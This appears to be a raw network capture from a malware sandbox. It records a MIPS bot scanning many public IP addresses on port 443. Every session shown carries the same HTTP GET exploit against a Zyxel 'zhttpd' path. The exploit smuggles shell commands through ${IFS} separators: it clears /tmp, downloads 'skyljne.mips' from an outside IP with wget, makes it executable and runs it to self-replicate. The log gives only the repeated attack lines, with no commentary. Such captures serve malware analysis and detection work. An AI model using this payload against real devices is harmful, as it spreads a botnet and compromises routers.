                                          Jan 14, 2024 15:46:23.129924059 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5961192.168.2.233606850.60.239.146443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:23.129950047 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5962192.168.2.2335780199.128.144.68443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:23.129968882 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5963192.168.2.2350874209.172.126.193443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:23.130000114 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5964192.168.2.2357310213.152.182.210443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:23.130008936 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5965192.168.2.233375499.117.112.7443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:23.130075932 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5966192.168.2.2334262201.191.102.151443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:23.130086899 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5967192.168.2.23370408.0.143.100443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:23.130088091 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5968192.168.2.2345700174.39.222.162443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:23.130122900 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5969192.168.2.234064849.49.83.120443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:23.130155087 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5970192.168.2.2345048108.191.45.29443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:23.130182028 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5971192.168.2.2351732184.237.89.21443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:23.130213976 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5972192.168.2.2341510152.19.227.72443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:23.130239964 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5973192.168.2.2352090119.182.155.174443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:23.130259991 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5974192.168.2.2346326202.141.5.86443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:23.130263090 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5975192.168.2.2355888212.154.159.241443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:23.130311966 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5976192.168.2.2360776152.84.78.82443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:23.130354881 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5977192.168.2.2344296172.186.211.48443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:23.130403996 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5978192.168.2.2335130222.19.14.146443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:23.130429029 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5979192.168.2.2349894105.146.175.5443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:23.130440950 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5980192.168.2.2347346189.145.231.116443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:23.130484104 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5981192.168.2.234284634.245.139.7443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:23.130502939 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5982192.168.2.236009842.76.233.244443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:23.130511045 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5983192.168.2.233759061.250.177.162443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:23.130532026 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5984192.168.2.2360290219.184.0.126443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:23.130557060 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5985192.168.2.2341644152.136.217.116443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:23.130567074 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5986192.168.2.235784465.10.233.250443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:23.130594015 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5987192.168.2.2345200139.179.195.56443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:23.130630970 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5988192.168.2.2346708112.28.51.199443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:23.130655050 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5989192.168.2.2333418101.164.174.81443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:23.130696058 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5990192.168.2.2345750139.104.12.199443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:23.130716085 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5991192.168.2.2340116140.14.154.196443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:23.130728960 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5992192.168.2.2359892154.22.159.136443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:23.130774021 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5993192.168.2.234382242.62.127.173443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:23.130774975 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5994192.168.2.2354782177.112.16.20443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:23.130804062 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5995192.168.2.2342388133.181.81.55443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:23.130830050 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5996192.168.2.234670667.183.146.73443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:23.130866051 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5997192.168.2.2333246196.71.27.72443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:23.130897045 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5998192.168.2.234965236.3.129.56443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:23.130920887 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5999192.168.2.2358562140.209.184.165443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:23.130948067 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6000192.168.2.236037632.10.202.44443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:23.130975962 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6001192.168.2.2353666181.133.39.84443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:23.130996943 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6002192.168.2.2359266184.130.208.171443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:23.131025076 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6003192.168.2.235367039.222.23.211443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:23.131052017 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6004192.168.2.2348958197.198.198.187443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:23.131053925 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6005192.168.2.2355068201.43.166.163443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:23.131088018 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6006192.168.2.2345970104.206.9.181443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:23.131114006 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6007192.168.2.234603853.62.220.32443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:23.131129980 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6008192.168.2.2336896168.192.179.60443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:23.131189108 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6009192.168.2.234322413.25.248.168443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:23.131207943 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6010192.168.2.2340304129.0.178.59443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:23.131217003 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6011192.168.2.2350668135.154.220.42443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:23.131242037 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6012192.168.2.236010261.117.40.247443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:23.131268978 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6013192.168.2.234440476.136.206.136443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:23.131318092 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6014192.168.2.233470294.125.66.67443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:23.131320953 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6015192.168.2.2343274162.144.187.28443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:23.131350994 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6016192.168.2.2340488131.52.82.142443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:23.131381989 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6017192.168.2.2342580168.45.208.44443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:23.131427050 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6018192.168.2.2354216216.210.171.170443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:23.131457090 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6019192.168.2.2338738176.15.7.241443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:23.131479025 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6020192.168.2.2352006170.177.170.15443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:23.131484032 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6021192.168.2.23408468.186.195.84443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:23.131513119 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6022192.168.2.233395060.50.89.85443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:23.131558895 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6023192.168.2.2340512180.89.90.243443
                                          TimestampBytes transferredDirectionData
